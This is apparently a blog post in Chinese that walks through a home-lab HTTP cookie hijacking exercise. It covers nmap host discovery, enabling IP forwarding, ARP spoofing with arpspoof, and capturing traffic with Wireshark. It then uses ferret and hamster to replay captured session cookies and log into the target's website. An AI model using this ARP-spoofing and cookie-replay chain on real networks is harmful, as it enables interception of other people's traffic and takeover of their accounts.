0%

http cookies劫持实验

http cookies劫持实验

1、首先保证虚拟机中的kali系统能够和外部网络通信

查看设置——虚拟网络编辑器——桥接无线网卡—虚拟机有线设置DHCP

ifconfig命令查看IP

kali的ip为

192.168.43.41

ping测试

2、扫描存活的主机

使用nmap扫描存活主机

nmap -T4 -A -v 192.168.43.0/24

发现本机IP为

192.168.43.55

3、用户的登录信息cookies

echo 1 > /proc/sys/net/ipv4/ip_forward #开启kali路由转发功能

arpspoof -i eth0 -t 192.168.43.1 192.168.43.55  

在kali打开wireshark抓包,同时在本机访问网站并登录

wireshark保存窃取的流量为test.pacp文件

在目标主机上登录相对应的网站,尽量选择安全性较低的,登录要留存过程

ferret -r test.pcap

处理流量,生成cookies文件hamster.text

启动hamster

打开浏览器地址栏输入127.0.0.1:1234
hamaster 找到目标IP 登录目标用户的网站

-------------本文结束感谢您的阅读-------------